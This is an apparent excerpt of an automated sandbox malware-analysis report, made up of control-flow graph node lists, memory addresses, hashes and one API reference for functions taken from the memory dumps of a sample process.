                                control_flow_graph 553 6cc59d8-6cc59fc 554 6cc59fe-6cc5a01 553->554 555 6cc5a0f-6cc5a12 554->555 556 6cc5a03-6cc5a0a 554->556 557 6cc5a18-6cc5bac 555->557 558 6cc5cfb-6cc5cfe 555->558 556->555 613 6cc5ce5-6cc5cf8 557->613 614 6cc5bb2-6cc5bb9 557->614 559 6cc5d16-6cc5d19 558->559 560 6cc5d00-6cc5d13 558->560 561 6cc5d1b-6cc5d2c 559->561 562 6cc5d33-6cc5d36 559->562 570 6cc5d2e 561->570 571 6cc5d7b-6cc5d82 561->571 565 6cc5d38-6cc5d49 562->565 566 6cc5d50-6cc5d53 562->566 573 6cc5d5e-6cc5d6f 565->573 577 6cc5d4b 565->577 566->557 569 6cc5d59-6cc5d5c 566->569 569->573 574 6cc5d76-6cc5d79 569->574 570->562 575 6cc5d87-6cc5d8a 571->575 573->571 580 6cc5d71 573->580 574->571 574->575 575->557 578 6cc5d90-6cc5d93 575->578 577->566 581 6cc5d95-6cc5da6 578->581 582 6cc5db1-6cc5db4 578->582 580->574 581->560 592 6cc5dac 581->592 584 6cc5dce-6cc5dd1 582->584 585 6cc5db6-6cc5dc7 582->585 588 6cc5ddb-6cc5ddd 584->588 589 6cc5dd3-6cc5dd8 584->589 585->571 595 6cc5dc9 585->595 590 6cc5ddf 588->590 591 6cc5de4-6cc5de7 588->591 589->588 590->591 591->554 594 6cc5ded-6cc5df6 591->594 592->582 595->584 615 6cc5c6d-6cc5c74 614->615 616 6cc5bbf-6cc5be2 614->616 615->613 617 6cc5c76-6cc5ca9 615->617 625 6cc5bea-6cc5bf2 616->625 629 6cc5cae-6cc5cdb 617->629 630 6cc5cab 617->630 627 6cc5bf4 625->627 628 6cc5bf7-6cc5c38 625->628 627->628 638 6cc5c3a-6cc5c4b 628->638 639 6cc5c50-6cc5c61 628->639 629->594 629->613 630->629 638->594 639->594
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: aba864a429d638c36de999942ff0c05da58f1387b19f2ef33b1819ca8cd4e586
                                • Instruction ID: 5a173e0001858965d67a31694a03da7b19eaa9a4268ff28318402992c0ac3384
                                • Opcode Fuzzy Hash: aba864a429d638c36de999942ff0c05da58f1387b19f2ef33b1819ca8cd4e586
                                • Instruction Fuzzy Hash: 37C18C35F002188FDB54DBA4C5946AEBBB2FF88320F60816DD402AB354DB35AD52CBA0
                                Function 0151EE57 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 642 151ee57-151eecc GlobalMemoryStatusEx 645 151eed5-151eefd 642->645 646 151eece-151eed4 642->646 646->645
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0151EEBF
                                Memory Dump Source
                                • Source File: 00000018.00000002.3858842698.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_1510000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 532fc9f04f973e5c341f5aeab657ff5788a2c84053e9a6b8f8adda5ddc11975a
                                • Instruction ID: c7cd20dbfd5d1ae8516db7cbd1c53dd9d3f108d812ae24ac61bf60171f7c5775
                                • Opcode Fuzzy Hash: 532fc9f04f973e5c341f5aeab657ff5788a2c84053e9a6b8f8adda5ddc11975a
                                • Instruction Fuzzy Hash: E81100B1C0065A9BDB10CFAAC445BDEFBF4BB48220F14856AD818A7240D378A9448FA1
                                Function 0151EE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 649 151ee58-151eecc GlobalMemoryStatusEx 651 151eed5-151eefd 649->651 652 151eece-151eed4 649->652 652->651
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0151EEBF
                                Memory Dump Source
                                • Source File: 00000018.00000002.3858842698.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_1510000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5cdd6bff1406e8213c401bfdcdd8c5f6f6bf7fa7d3676469c7a0027d25d5c938
                                • Instruction ID: 1d7bf735f3e97ab9175b4a85c1157e705eceef4ed5be64f7d3363c1cc6d0886a
                                • Opcode Fuzzy Hash: 5cdd6bff1406e8213c401bfdcdd8c5f6f6bf7fa7d3676469c7a0027d25d5c938
                                • Instruction Fuzzy Hash: F711DDB2C0065A9BDB10CFAAC445B9EFBF4BB48220F15856AD818A7640D378A9448FA5
                                Function 06CC58AF Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 655 6cc58af-6cc58c3 656 6cc58cd-6cc58d0 655->656 657 6cc58f2-6cc58f5 656->657 658 6cc58d2-6cc58d6 656->658 661 6cc5909-6cc590c 657->661 662 6cc58f7-6cc58fe 657->662 659 6cc58dc-6cc58e4 658->659 660 6cc59c2-6cc59d0 658->660 659->660 667 6cc58ea-6cc58ed 659->667 676 6cc5a00-6cc5a0a 660->676 677 6cc59d2-6cc59d6 660->677 665 6cc592e-6cc5931 661->665 666 6cc590e-6cc5912 661->666 663 6cc59ba-6cc59c1 662->663 664 6cc5904 662->664 664->661 669 6cc594f-6cc5952 665->669 670 6cc5933-6cc5937 665->670 666->660 668 6cc5918-6cc5920 666->668 667->657 668->660 672 6cc5926-6cc5929 668->672 674 6cc596a-6cc596d 669->674 675 6cc5954-6cc5965 669->675 670->660 673 6cc593d-6cc5945 670->673 672->665 673->660 679 6cc5947-6cc594a 673->679 680 6cc596f-6cc5976 674->680 681 6cc5977-6cc597a 674->681 675->674 678 6cc5a0f-6cc5a12 676->678 684 6cc5a18-6cc5bac 678->684 685 6cc5cfb-6cc5cfe 678->685 679->669 682 6cc597c-6cc5980 681->682 683 6cc5994-6cc5997 681->683 682->660 687 6cc5982-6cc598a 682->687 688 6cc59a8-6cc59aa 683->688 689 6cc5999-6cc59a3 683->689 750 6cc5ce5-6cc5cf8 684->750 751 6cc5bb2-6cc5bb9 684->751 690 6cc5d16-6cc5d19 685->690 691 6cc5d00-6cc5d13 685->691 687->660 692 6cc598c-6cc598f 687->692 696 6cc59ac 688->696 697 6cc59b1-6cc59b4 688->697 689->688 693 6cc5d1b-6cc5d2c 690->693 694 6cc5d33-6cc5d36 690->694 692->683 705 6cc5d2e 693->705 706 6cc5d7b-6cc5d82 693->706 700 6cc5d38-6cc5d49 694->700 701 6cc5d50-6cc5d53 694->701 696->697 697->656 697->663 708 6cc5d5e-6cc5d6f 700->708 712 6cc5d4b 700->712 701->684 704 6cc5d59-6cc5d5c 701->704 704->708 709 6cc5d76-6cc5d79 704->709 705->694 710 6cc5d87-6cc5d8a 706->710 708->706 715 6cc5d71 708->715 709->706 709->710 710->684 713 6cc5d90-6cc5d93 710->713 712->701 716 6cc5d95-6cc5da6 713->716 717 6cc5db1-6cc5db4 713->717 715->709 716->691 727 6cc5dac 716->727 719 6cc5dce-6cc5dd1 717->719 720 6cc5db6-6cc5dc7 717->720 723 6cc5ddb-6cc5ddd 719->723 724 6cc5dd3-6cc5dd8 719->724 720->706 731 6cc5dc9 720->731 725 6cc5ddf 723->725 726 6cc5de4-6cc5de7 723->726 724->723 725->726 729 6cc5ded-6cc5df6 726->729 730 6cc59fe-6cc5a01 726->730 727->717 730->678 733 6cc5a03-6cc5a0a 730->733 731->719 733->678 752 6cc5c6d-6cc5c74 751->752 753 6cc5bbf-6cc5be2 751->753 752->750 754 6cc5c76-6cc5ca9 752->754 762 6cc5bea-6cc5bf2 753->762 766 6cc5cae-6cc5cdb 754->766 767 6cc5cab 754->767 764 6cc5bf4 762->764 765 6cc5bf7-6cc5c38 762->765 764->765 775 6cc5c3a-6cc5c4b 765->775 776 6cc5c50-6cc5c61 765->776 766->729 766->750 767->766 775->729 776->729
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: eba76f8db1840b72d68288ba682fecf89c29cdd2c117b592639801460cdbba5c
                                • Instruction ID: 71bfb0014024bb1388e3aa7f4148e6fe9eb7c6e617b4189f5a4174e427fc9697
                                • Opcode Fuzzy Hash: eba76f8db1840b72d68288ba682fecf89c29cdd2c117b592639801460cdbba5c
                                • Instruction Fuzzy Hash: 75B18F75E002189FDB60DBA4C5846DEBBB2FF88320F2481ADD4597B344DB31AD56CBA0
                                Function 06CC59D7 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 914 6cc59d7-6cc59fc 916 6cc59fe-6cc5a01 914->916 917 6cc5a0f-6cc5a12 916->917 918 6cc5a03-6cc5a0a 916->918 919 6cc5a18-6cc5bac 917->919 920 6cc5cfb-6cc5cfe 917->920 918->917 975 6cc5ce5-6cc5cf8 919->975 976 6cc5bb2-6cc5bb9 919->976 921 6cc5d16-6cc5d19 920->921 922 6cc5d00-6cc5d13 920->922 923 6cc5d1b-6cc5d2c 921->923 924 6cc5d33-6cc5d36 921->924 932 6cc5d2e 923->932 933 6cc5d7b-6cc5d82 923->933 927 6cc5d38-6cc5d49 924->927 928 6cc5d50-6cc5d53 924->928 935 6cc5d5e-6cc5d6f 927->935 939 6cc5d4b 927->939 928->919 931 6cc5d59-6cc5d5c 928->931 931->935 936 6cc5d76-6cc5d79 931->936 932->924 937 6cc5d87-6cc5d8a 933->937 935->933 942 6cc5d71 935->942 936->933 936->937 937->919 940 6cc5d90-6cc5d93 937->940 939->928 943 6cc5d95-6cc5da6 940->943 944 6cc5db1-6cc5db4 940->944 942->936 943->922 954 6cc5dac 943->954 946 6cc5dce-6cc5dd1 944->946 947 6cc5db6-6cc5dc7 944->947 950 6cc5ddb-6cc5ddd 946->950 951 6cc5dd3-6cc5dd8 946->951 947->933 957 6cc5dc9 947->957 952 6cc5ddf 950->952 953 6cc5de4-6cc5de7 950->953 951->950 952->953 953->916 956 6cc5ded-6cc5df6 953->956 954->944 957->946 977 6cc5c6d-6cc5c74 976->977 978 6cc5bbf-6cc5be2 976->978 977->975 979 6cc5c76-6cc5ca9 977->979 987 6cc5bea-6cc5bf2 978->987 991 6cc5cae-6cc5cdb 979->991 992 6cc5cab 979->992 989 6cc5bf4 987->989 990 6cc5bf7-6cc5c38 987->990 989->990 1000 6cc5c3a-6cc5c4b 990->1000 1001 6cc5c50-6cc5c61 990->1001 991->956 991->975 992->991 1000->956 1001->956
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: d5ea3dc0076c165a597a26218c6e07de644354f4132b13111cbb9f213c3b70be
                                • Instruction ID: a1aea953e185a057f8c546e35cdc731e86401951a60eb043338c329ac6bf5e9c
                                • Opcode Fuzzy Hash: d5ea3dc0076c165a597a26218c6e07de644354f4132b13111cbb9f213c3b70be
                                • Instruction Fuzzy Hash: CF812875E012189FDB14DBA4C954ADEBBF2FF88720F248169D401BB354DB71AD46CBA0
                                Function 06CCD070 Relevance: .8, Instructions: 799COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1306 6ccd070-6ccd08b 1307 6ccd08d-6ccd090 1306->1307 1308 6ccd0d9-6ccd0dc 1307->1308 1309 6ccd092-6ccd0a1 1307->1309 1312 6ccd0de-6ccd120 1308->1312 1313 6ccd125-6ccd128 1308->1313 1310 6ccd0b0-6ccd0bc 1309->1310 1311 6ccd0a3-6ccd0a8 1309->1311 1314 6ccda8d-6ccdac6 1310->1314 1315 6ccd0c2-6ccd0d4 1310->1315 1311->1310 1312->1313 1316 6ccd12a-6ccd12c 1313->1316 1317 6ccd137-6ccd13a 1313->1317 1329 6ccdac8-6ccdacb 1314->1329 1315->1308 1318 6ccd559 1316->1318 1319 6ccd132 1316->1319 1320 6ccd13c-6ccd141 1317->1320 1321 6ccd144-6ccd147 1317->1321 1323 6ccd55c-6ccd568 1318->1323 1319->1317 1320->1321 1326 6ccd149-6ccd18b 1321->1326 1327 6ccd190-6ccd193 1321->1327 1323->1309 1328 6ccd56e-6ccd85b 1323->1328 1326->1327 1330 6ccd1dc-6ccd1df 1327->1330 1331 6ccd195-6ccd1d7 1327->1331 1519 6ccd861-6ccd867 1328->1519 1520 6ccda82-6ccda8c 1328->1520 1335 6ccdacd-6ccdae9 1329->1335 1336 6ccdaee-6ccdaf1 1329->1336 1333 6ccd228-6ccd22b 1330->1333 1334 6ccd1e1-6ccd223 1330->1334 1331->1330 1342 6ccd22d-6ccd26f 1333->1342 1343 6ccd274-6ccd277 1333->1343 1334->1333 1335->1336 1340 6ccdb24-6ccdb27 1336->1340 1341 6ccdaf3-6ccdb1f 1336->1341 1350 6ccdb29 call 6ccdbe5 1340->1350 1351 6ccdb36-6ccdb38 1340->1351 1341->1340 1342->1343 1347 6ccd279-6ccd288 1343->1347 1348 6ccd2c0-6ccd2c3 1343->1348 1358 6ccd28a-6ccd28f 1347->1358 1359 6ccd297-6ccd2a3 1347->1359 1352 6ccd2c5-6ccd2c7 1348->1352 1353 6ccd2d2-6ccd2d5 1348->1353 1371 6ccdb2f-6ccdb31 1350->1371 1354 6ccdb3f-6ccdb42 1351->1354 1355 6ccdb3a 1351->1355 1362 6ccd2cd 1352->1362 1363 6ccd417-6ccd420 1352->1363 1364 6ccd2d7-6ccd2ed 1353->1364 1365 6ccd2f2-6ccd2f5 1353->1365 1354->1329 1366 6ccdb44-6ccdb53 1354->1366 1355->1354 1358->1359 1359->1314 1370 6ccd2a9-6ccd2bb 1359->1370 1362->1353 1377 6ccd42f-6ccd43b 1363->1377 1378 6ccd422-6ccd427 1363->1378 1364->1365 1374 6ccd33e-6ccd341 1365->1374 1375 6ccd2f7-6ccd339 1365->1375 1389 6ccdbba-6ccdbcf 1366->1389 1390 6ccdb55-6ccdbb8 call 6cc66b8 1366->1390 1370->1348 1371->1351 1384 6ccd364-6ccd367 1374->1384 1385 6ccd343-6ccd35f 1374->1385 1375->1374 1386 6ccd54c-6ccd551 1377->1386 1387 6ccd441-6ccd455 1377->1387 1378->1377 1384->1323 1394 6ccd36d-6ccd370 1384->1394 1385->1384 1386->1318 1387->1318 1411 6ccd45b-6ccd46d 1387->1411 1418 6ccdbd0 1389->1418 1390->1389 1402 6ccd3b9-6ccd3bc 1394->1402 1403 6ccd372-6ccd3b4 1394->1403 1406 6ccd3be-6ccd400 1402->1406 1407 6ccd405-6ccd407 1402->1407 1403->1402 1406->1407 1415 6ccd40e-6ccd411 1407->1415 1416 6ccd409 1407->1416 1427 6ccd46f-6ccd475 1411->1427 1428 6ccd491-6ccd493 1411->1428 1415->1307 1415->1363 1416->1415 1418->1418 1429 6ccd479-6ccd485 1427->1429 1430 6ccd477 1427->1430 1435 6ccd49d-6ccd4a9 1428->1435 1437 6ccd487-6ccd48f 1429->1437 1430->1437 1446 6ccd4ab-6ccd4b5 1435->1446 1447 6ccd4b7 1435->1447 1437->1435 1448 6ccd4bc-6ccd4be 1446->1448 1447->1448 1448->1318 1453 6ccd4c4-6ccd4e0 call 6cc66b8 1448->1453 1462 6ccd4ef-6ccd4fb 1453->1462 1463 6ccd4e2-6ccd4e7 1453->1463 1462->1386 1466 6ccd4fd-6ccd54a 1462->1466 1463->1462 1466->1318 1521 6ccd869-6ccd86e 1519->1521 1522 6ccd876-6ccd87f 1519->1522 1521->1522 1522->1314 1523 6ccd885-6ccd898 1522->1523 1525 6ccd89e-6ccd8a4 1523->1525 1526 6ccda72-6ccda7c 1523->1526 1527 6ccd8a6-6ccd8ab 1525->1527 1528 6ccd8b3-6ccd8bc 1525->1528 1526->1519 1526->1520 1527->1528 1528->1314 1529 6ccd8c2-6ccd8e3 1528->1529 1532 6ccd8e5-6ccd8ea 1529->1532 1533 6ccd8f2-6ccd8fb 1529->1533 1532->1533 1533->1314 1534 6ccd901-6ccd91e 1533->1534 1534->1526 1537 6ccd924-6ccd92a 1534->1537 1537->1314 1538 6ccd930-6ccd949 1537->1538 1540 6ccd94f-6ccd976 1538->1540 1541 6ccda65-6ccda6c 1538->1541 1540->1314 1544 6ccd97c-6ccd986 1540->1544 1541->1526 1541->1537 1544->1314 1545 6ccd98c-6ccd9a3 1544->1545 1547 6ccd9a5-6ccd9b0 1545->1547 1548 6ccd9b2-6ccd9cd 1545->1548 1547->1548 1548->1541 1553 6ccd9d3-6ccd9ec call 6cc66b8 1548->1553 1557 6ccd9ee-6ccd9f3 1553->1557 1558 6ccd9fb-6ccda04 1553->1558 1557->1558 1558->1314 1559 6ccda0a-6ccda5e 1558->1559 1559->1541
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c78efeea143f9f7eede68f484af861dd87cdc8281799f3bb0f4e8202ef2bcc23
                                • Instruction ID: f086cbc08be908d5f806e6ddc0413f0c2d723dac0a357a84585ed6eaa1adac4c
                                • Opcode Fuzzy Hash: c78efeea143f9f7eede68f484af861dd87cdc8281799f3bb0f4e8202ef2bcc23
                                • Instruction Fuzzy Hash: 0E625A74A006098FDB55EF68D590A9EB7B2FF84310B208A78D006AF355DB79FD46CB81
                                Function 06CCB768 Relevance: .5, Instructions: 473COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01ae3e1f88e6af37b9ec7392477156a5f9f20e6e6596ad2900e0fce42c1bad19
                                • Instruction ID: bc2bfd841140a735f5b77c65ace59f9cd83dc0d669e1687a0630b701ec0e7aad
                                • Opcode Fuzzy Hash: 01ae3e1f88e6af37b9ec7392477156a5f9f20e6e6596ad2900e0fce42c1bad19
                                • Instruction Fuzzy Hash: 32027B30E102098FDBA4CFA8D591BADB7B2FB85320F20856EE405EB255DB35ED45CB91
                                Function 06CCADE8 Relevance: .4, Instructions: 392COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2087 6ccade8-6ccae06 2088 6ccae08-6ccae0b 2087->2088 2089 6ccae0d-6ccae29 2088->2089 2090 6ccae2e-6ccae31 2088->2090 2089->2090 2091 6ccb005-6ccb00e 2090->2091 2092 6ccae37-6ccae3a 2090->2092 2095 6ccb014-6ccb01e 2091->2095 2096 6ccae91-6ccae9a 2091->2096 2093 6ccae3c-6ccae49 2092->2093 2094 6ccae4e-6ccae51 2092->2094 2093->2094 2100 6ccae62-6ccae65 2094->2100 2101 6ccae53-6ccae57 2094->2101 2098 6ccb01f-6ccb056 2096->2098 2099 6ccaea0-6ccaea4 2096->2099 2113 6ccb058-6ccb05b 2098->2113 2102 6ccaea9-6ccaeac 2099->2102 2105 6ccae6f-6ccae72 2100->2105 2106 6ccae67-6ccae6c 2100->2106 2101->2095 2104 6ccae5d 2101->2104 2109 6ccaebc-6ccaebe 2102->2109 2110 6ccaeae-6ccaeb7 2102->2110 2104->2100 2111 6ccae8c-6ccae8f 2105->2111 2112 6ccae74-6ccae87 2105->2112 2106->2105 2114 6ccaec5-6ccaec8 2109->2114 2115 6ccaec0 2109->2115 2110->2109 2111->2096 2111->2102 2112->2111 2118 6ccb05d-6ccb079 2113->2118 2119 6ccb07e-6ccb081 2113->2119 2114->2088 2116 6ccaece-6ccaef2 2114->2116 2115->2114 2136 6ccaef8-6ccaf07 2116->2136 2137 6ccb002 2116->2137 2118->2119 2120 6ccb090-6ccb093 2119->2120 2121 6ccb083 call 6ccb349 2119->2121 2123 6ccb095-6ccb099 2120->2123 2124 6ccb0a0-6ccb0a3 2120->2124 2126 6ccb089-6ccb08b 2121->2126 2127 6ccb0a9-6ccb0e4 2123->2127 2128 6ccb09b 2123->2128 2124->2127 2129 6ccb30c-6ccb30f 2124->2129 2126->2120 2140 6ccb0ea-6ccb0f6 2127->2140 2141 6ccb2d7-6ccb2ea 2127->2141 2128->2124 2132 6ccb31c-6ccb31e 2129->2132 2133 6ccb311-6ccb31b 2129->2133 2134 6ccb325-6ccb328 2132->2134 2135 6ccb320 2132->2135 2134->2113 2139 6ccb32e-6ccb338 2134->2139 2135->2134 2145 6ccaf1f-6ccaf5a call 6cc66b8 2136->2145 2146 6ccaf09-6ccaf0f 2136->2146 2137->2091 2148 6ccb0f8-6ccb111 2140->2148 2149 6ccb116-6ccb15a 2140->2149 2142 6ccb2ec 2141->2142 2147 6ccb2ed 2142->2147 2163 6ccaf5c-6ccaf62 2145->2163 2164 6ccaf72-6ccaf89 2145->2164 2150 6ccaf11 2146->2150 2151 6ccaf13-6ccaf15 2146->2151 2147->2147 2148->2142 2165 6ccb15c-6ccb16e 2149->2165 2166 6ccb176-6ccb1b5 2149->2166 2150->2145 2151->2145 2167 6ccaf64 2163->2167 2168 6ccaf66-6ccaf68 2163->2168 2175 6ccaf8b-6ccaf91 2164->2175 2176 6ccafa1-6ccafb2 2164->2176 2165->2166 2173 6ccb29c-6ccb2b1 2166->2173 2174 6ccb1bb-6ccb296 call 6cc66b8 2166->2174 2167->2164 2168->2164 2173->2141 2174->2173 2179 6ccaf95-6ccaf97 2175->2179 2180 6ccaf93 2175->2180 2184 6ccafca-6ccaffb 2176->2184 2185 6ccafb4-6ccafba 2176->2185 2179->2176 2180->2176 2184->2137 2187 6ccafbc 2185->2187 2188 6ccafbe-6ccafc0 2185->2188 2187->2184 2188->2184
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d24bf7c0c3f7f71143df72f0575d495867836c23588043fe79fb68a5fcc6d80
                                • Instruction ID: 16ffdc94ab46b5590d12d89c877cbbc09a64aa28c3f311da75d5cded2ff75ac3
                                • Opcode Fuzzy Hash: 5d24bf7c0c3f7f71143df72f0575d495867836c23588043fe79fb68a5fcc6d80
                                • Instruction Fuzzy Hash: 51E17C70F1020A8FDB64DFA9D8846AEB7B2FF88310F10852DD416AB354DB75ED428B91
                                Function 06CCB349 Relevance: .3, Instructions: 306COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd0c80c7488d8b2520fa73db2f0c93cd811b8f0538c6f6188b37fdc4eed8337b
                                • Instruction ID: aa75f5c4337545e55e6552bdee6b4575256ec8add7b307c8919b82b5f08caba9
                                • Opcode Fuzzy Hash: fd0c80c7488d8b2520fa73db2f0c93cd811b8f0538c6f6188b37fdc4eed8337b
                                • Instruction Fuzzy Hash: BFB17634E102098FEF64DAE8D4917BEB7B6FB89320F24842DE805E7391DA35DD418B61
                                Function 06CCB767 Relevance: .3, Instructions: 266COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a35528522edfc3362219e695f1556317a6ab6a144d1faab4b43c69669af5b5b3
                                • Instruction ID: ba3a187c4133dcf870c68ff9e11d7a3f8d43a639df4c9ceab2c79af16b348814
                                • Opcode Fuzzy Hash: a35528522edfc3362219e695f1556317a6ab6a144d1faab4b43c69669af5b5b3
                                • Instruction Fuzzy Hash: 06A13730E102098BDFA4CFA8D591BADB7B1EB45320F24852EE419EB351DB34EE81CB51
                                Function 06CC8190 Relevance: .2, Instructions: 248COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17079fc76fff7ece83af74c81c1247d7f0aa957342f2b4f3ab48189554b5269c
                                • Instruction ID: 547dc9751acd5f8bc2997687a5f549394e73b31c2a91cf087d58beed5d978287
                                • Opcode Fuzzy Hash: 17079fc76fff7ece83af74c81c1247d7f0aa957342f2b4f3ab48189554b5269c
                                • Instruction Fuzzy Hash: D791BC30B116048FDB54DBA9D8906AEBBB6FF84310F54882DD905EB350DB78ED428B90
                                Function 06CC9268 Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e71f29f88d30f1b6841660a41298bf9c24502055702b1bc2a063bd6667daff24
                                • Instruction ID: db27f8144863a5f6e82078cee43f29fdf681ea8ed1364e36b4c43a376b885639
                                • Opcode Fuzzy Hash: e71f29f88d30f1b6841660a41298bf9c24502055702b1bc2a063bd6667daff24
                                • Instruction Fuzzy Hash: 0B913C74F106098FDB64DB69D8A07AEBBF2FFC8310F508569C509AB344EB74AD418B91
                                Function 06CC6308 Relevance: .2, Instructions: 229COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0d112c09d1bc399b5d5862bcc884296ddce66685289510db9ebabcce944a493
                                • Instruction ID: bede87ac8ee8d4da9be67cbdb82dd22473680bbf1d4ed754784b79627e15ffe2
                                • Opcode Fuzzy Hash: e0d112c09d1bc399b5d5862bcc884296ddce66685289510db9ebabcce944a493
                                • Instruction Fuzzy Hash: 1461B5B1F001114FDB549BBEC89466EBAE7AFC4620B29443DD80ADB360DE76ED0287D1
                                Function 06CC43B9 Relevance: .2, Instructions: 227COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ebe12a28e6b29edaadfaa590854e7794489a3626bcdc68d9684956c76ea043f3
                                • Instruction ID: 6b72c94ed5eee16dadf833845e2046ef1e026b6089a60e30fad65ea723e42d5f
                                • Opcode Fuzzy Hash: ebe12a28e6b29edaadfaa590854e7794489a3626bcdc68d9684956c76ea043f3
                                • Instruction Fuzzy Hash: BE810C74B006498FDB58DFA8D4A069E7BF2BB89310F20C529D509EB354DB35ED428B91
                                Function 06CC46D4 Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7026e3903a508975bec6674ae61e4e11737ca7cd7448a229c61dd7e0b446fb99
                                • Instruction ID: b9c63a2511f2c9b0afacbff7fe43a9933b3db57ab524a43d35525ae755ddad25
